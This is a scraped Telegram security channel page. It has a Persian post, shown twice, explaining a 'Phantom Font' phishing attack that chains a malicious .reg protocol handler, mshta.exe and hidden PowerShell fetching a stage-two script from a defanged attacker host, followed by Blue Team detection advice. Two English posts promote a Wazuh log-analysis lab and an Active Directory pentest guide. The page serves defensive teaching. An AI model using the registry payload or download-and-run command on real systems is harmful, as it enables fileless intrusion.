🎯 حمله فونت شبح (Phantom Font Attack): جایی که mshta.exe با رجیستری متحد میشود!
یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم میتوانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!
🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟
پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایلهای hta (HTML Application) طراحی شده است.
این فایلها میتوانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا میکند.
📌 محل پیشفرض:
چرا مهاجمان عاشق mshta.exe هستند؟
✅ بهصورت پیشفرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتیویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه
📌 نمونه استفاده مخرب:
mshta.exe "javascript : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"
🧩 مراحل حمله فونت شبح:
1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت میکند (مثلاً CorpSans.ttf)
اما بهجای فونت، یک فایل مشکوک
2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام
و میگوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:
[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javascript:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""
3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به
پراسس mshta.exe اجرا میشود، مقدار Payload از رجیستری خوانده میشود و PowerShell مخفیانه اجرا میشود:
javascript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);
🔍 چرا این حمله خطرناک است؟
✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا بهصورت Stealth (بدون پنجره و هشدار)
🛡 نکات مهم برای Blue Team:
🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر
🔸 هر اجرای ناگهانی mshta بدون فایل
🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک
🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!
#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم میتوانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!
🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟
پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایلهای hta (HTML Application) طراحی شده است.
این فایلها میتوانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا میکند.
📌 محل پیشفرض:
C:\\Windows\\System32\\mshta.exeچرا مهاجمان عاشق mshta.exe هستند؟
✅ بهصورت پیشفرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتیویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه
📌 نمونه استفاده مخرب:
mshta.exe "javascript : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"
🧩 مراحل حمله فونت شبح:
1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت میکند (مثلاً CorpSans.ttf)
اما بهجای فونت، یک فایل مشکوک
.reg را دانلود میکند.2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام
fontview:// تعریف میکند.و میگوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:
[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javascript:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""
3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به
fontview://load ریدایرکت میشود.پراسس mshta.exe اجرا میشود، مقدار Payload از رجیستری خوانده میشود و PowerShell مخفیانه اجرا میشود:
javascript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);
🔍 چرا این حمله خطرناک است؟
✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا بهصورت Stealth (بدون پنجره و هشدار)
🛡 نکات مهم برای Blue Team:
🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر
HKEY_CLASSES_ROOT و Protocol Handlerها را لاگ کنید🔸 هر اجرای ناگهانی mshta بدون فایل
.hta را بررسی کنید🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک
🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!
#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👏2🔥1🎉1🤩1
1764146008730.pdf
4.5 MB
🧠 Log Analysis + Wazuh Integration — Hands-On Mini Lab for Blue Teamers 🚀
Just finished going through this practical guide on Linux & Windows log analysis with Wazuh and it’s one of the clearest step-by-step walkthroughs I’ve seen for juniors and SOC beginners.
Here’s what you’ll practice inside the PDF:
🔹 Linux Log Analysis
Exploring key log files under /var/log (boot, cron, secure, mail, httpd, messages)
Verifying package installation logs via apt
Reviewing firewall activity with UFW logs
🔹 Windows Event Log Analysis
Enabling audit policies via Local Security Policy
Using Event Viewer to track security events (e.g. 4625, 4776)
Simulating RDP brute-force attempts and interpreting the resulting logs
🔹 Wazuh Integration (SIEM)
Configuring ossec.conf for Linux & Windows log collection
Validating events in the Wazuh dashboard (Threat Hunting & Discover views)
Correlating firewall, package, and authentication events across hosts
🎯 Great for:
Students, SOC interns, junior analysts, and anyone who wants a lab-style intro to log analysis + Wazuh without getting lost in theory.
📘 I’ve attached the PDF — worth saving if you’re building your Blue Team fundamentals or preparing for SOC roles.
What other SIEM or log analysis topics would you like to see broken down like this?
#Wazuh #SIEM #LogAnalysis #SOCAnalyst #BlueTeam #DFIR #Linux #WindowsSecurity #CyberSecurity #ThreatHunting
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Just finished going through this practical guide on Linux & Windows log analysis with Wazuh and it’s one of the clearest step-by-step walkthroughs I’ve seen for juniors and SOC beginners.
Here’s what you’ll practice inside the PDF:
🔹 Linux Log Analysis
Exploring key log files under /var/log (boot, cron, secure, mail, httpd, messages)
Verifying package installation logs via apt
Reviewing firewall activity with UFW logs
🔹 Windows Event Log Analysis
Enabling audit policies via Local Security Policy
Using Event Viewer to track security events (e.g. 4625, 4776)
Simulating RDP brute-force attempts and interpreting the resulting logs
🔹 Wazuh Integration (SIEM)
Configuring ossec.conf for Linux & Windows log collection
Validating events in the Wazuh dashboard (Threat Hunting & Discover views)
Correlating firewall, package, and authentication events across hosts
🎯 Great for:
Students, SOC interns, junior analysts, and anyone who wants a lab-style intro to log analysis + Wazuh without getting lost in theory.
📘 I’ve attached the PDF — worth saving if you’re building your Blue Team fundamentals or preparing for SOC roles.
What other SIEM or log analysis topics would you like to see broken down like this?
#Wazuh #SIEM #LogAnalysis #SOCAnalyst #BlueTeam #DFIR #Linux #WindowsSecurity #CyberSecurity #ThreatHunting
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤2❤🔥1🔥1
Network Security Channel
1779114743231.pdf
🔴 Active Directory is still one of the most targeted attack surfaces in enterprise environments.
I recently explored a comprehensive walkthrough on performing Active Directory penetration testing using BloodyAD — a powerful Linux-based tool for interacting with AD through LDAP and SAMR.
The document demonstrates how common AD misconfigurations can quickly lead to full domain compromise through techniques such as:
✅ AD Enumeration
✅ Kerberoasting & AS-REP Roasting
✅ DCSync Attacks
✅ ACL Abuse & GenericAll Exploitation
✅ Resource-Based Constrained Delegation (RBCD)
✅ Shadow Credentials Attack
✅ LAPS Password Extraction
✅ LDAP Enumeration & Privilege Escalation
What makes this especially valuable is the defensive perspective:
every attack path is paired with detection opportunities and hardening recommendations.
Key takeaway:
Most AD compromises happen because of misconfigurations, excessive privileges, weak monitoring, and poor segmentation — not “advanced malware.”
For Red Teamers, SOC Analysts, Blue Teams, and AD Administrators, understanding these attack chains is critical for building stronger defenses.
📌 Offensive knowledge builds defensive strength.
#CyberSecurity #ActiveDirectory #RedTeam #BlueTeam #ThreatHunting #Pentesting #ADSecurity #Kerberoasting #DCSync #RBCD #BloodHound #SOC #EthicalHacking #WindowsSecurity
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
I recently explored a comprehensive walkthrough on performing Active Directory penetration testing using BloodyAD — a powerful Linux-based tool for interacting with AD through LDAP and SAMR.
The document demonstrates how common AD misconfigurations can quickly lead to full domain compromise through techniques such as:
✅ AD Enumeration
✅ Kerberoasting & AS-REP Roasting
✅ DCSync Attacks
✅ ACL Abuse & GenericAll Exploitation
✅ Resource-Based Constrained Delegation (RBCD)
✅ Shadow Credentials Attack
✅ LAPS Password Extraction
✅ LDAP Enumeration & Privilege Escalation
What makes this especially valuable is the defensive perspective:
every attack path is paired with detection opportunities and hardening recommendations.
Key takeaway:
Most AD compromises happen because of misconfigurations, excessive privileges, weak monitoring, and poor segmentation — not “advanced malware.”
For Red Teamers, SOC Analysts, Blue Teams, and AD Administrators, understanding these attack chains is critical for building stronger defenses.
📌 Offensive knowledge builds defensive strength.
#CyberSecurity #ActiveDirectory #RedTeam #BlueTeam #ThreatHunting #Pentesting #ADSecurity #Kerberoasting #DCSync #RBCD #BloodHound #SOC #EthicalHacking #WindowsSecurity
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
❤1